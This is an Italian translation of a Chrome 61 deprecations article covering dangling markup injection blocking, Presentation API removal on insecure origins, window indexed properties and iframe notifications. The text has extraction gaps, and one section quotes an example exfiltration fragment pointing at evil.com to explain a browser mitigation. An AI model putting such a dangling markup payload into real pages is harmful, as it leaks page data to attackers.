In quasi tutte le versioni di Chrome registriamo un numero significativo di aggiornamenti e miglioramenti al prodotto, alle sue prestazioni e anche alle funzionalità del web Piattaforma. Questo articolo descrive i ritiri e le rimozioni in Chrome 61, che è in versione beta dal 3 agosto. Questo elenco è soggetto a modifiche in qualsiasi momento.
Sicurezza e privacy
Blocca le risorse i cui URL contengono "\n" e "<" caratteri
Esiste un tipo di pirateria informatica chiamato dangling markup injection, in cui una
viene utilizzato per inviare dati a un endpoint esterno. Ad esempio:
considera una pagina contenente <img src='https://evil.com/?
. Poiché l'URL non contiene
virgolette di chiusura, i browser leggeranno la citazione successiva in questione e tratteranno
racchiusi caratteri come se si trattasse di un singolo URL.
Chrome 61 mitiga questa vulnerabilità limitando i set di caratteri
consentito negli attributi href
e src
. Nello specifico, Chrome interromperà
di elaborazione degli URL quando rileva caratteri di nuova riga (\n
) e meno di
(<
).
Sviluppatori con un caso d'uso legittimo per la nuova riga e meno di caratteri in un Questi caratteri devono essere preceduti da caratteri di escape.
Intenzione di rimozione | Tracker dello stato di Chrome | Bug di Chromium
Ritira e rimuovi l'API Presentation in contesti non sicuri
È stato scoperto che, su origini non sicure, l'API Presentation può essere utilizzata come di pirateria informatica su origini non sicure. Poiché i display non hanno le barre degli indirizzi, L'API può essere utilizzata per lo spoofing dei contenuti. È anche possibile esfiltrare i dati una presentazione in esecuzione.
In linea con l'intenzione di Blink di rimuovere funzionalità potenti da origini non sicure, prevediamo di ritirare e
Rimuovi il supporto dell'API Presentation in contesti non sicuri. Avvio in Chrome
61, PresentationRequest.start()
non funzionerà più su origini non sicure.
Intenzione di rimozione | Tracker dello stato di Chrome | Bug di Chromium
JavaScript
Non consentire la definizione delle proprietà indicizzate nelle finestre
In precedenza, alcuni browser consentivano di eseguire assegnazioni JavaScript come le seguenti:
window[0] = 1;
Le note della specifica HTML correnti che si tratta di una violazione esplicita delle la specifica JavaScript. Di conseguenza, questa funzionalità viene rimossa in Chrome 61. Dati aggiornati Febbraio 2016, Firefox è già conforme.
Rimuovi l'utilizzo delle notifiche da iframe non sicuri
Le richieste di autorizzazione provenienti da iframe possono confondere gli utenti poiché è difficile distinguere tra l'origine della pagina contenitore e l'origine dell'iframe che effettua la richiesta. Quando l'ambito delle richieste non è chiaro, è difficile che gli utenti possono decidere se concedere o negare l'autorizzazione.
Se non consenti le notifiche negli iframe, verranno allineati anche i requisiti per l'autorizzazione alle notifiche con quella delle notifiche push, in modo da sviluppatori.
Gli sviluppatori che hanno bisogno di questa funzionalità possono aprire una nuova finestra per richiedere autorizzazione alle notifiche.
Intenzione di rimozione | Tracker dello stato di Chrome | Bug di Chromium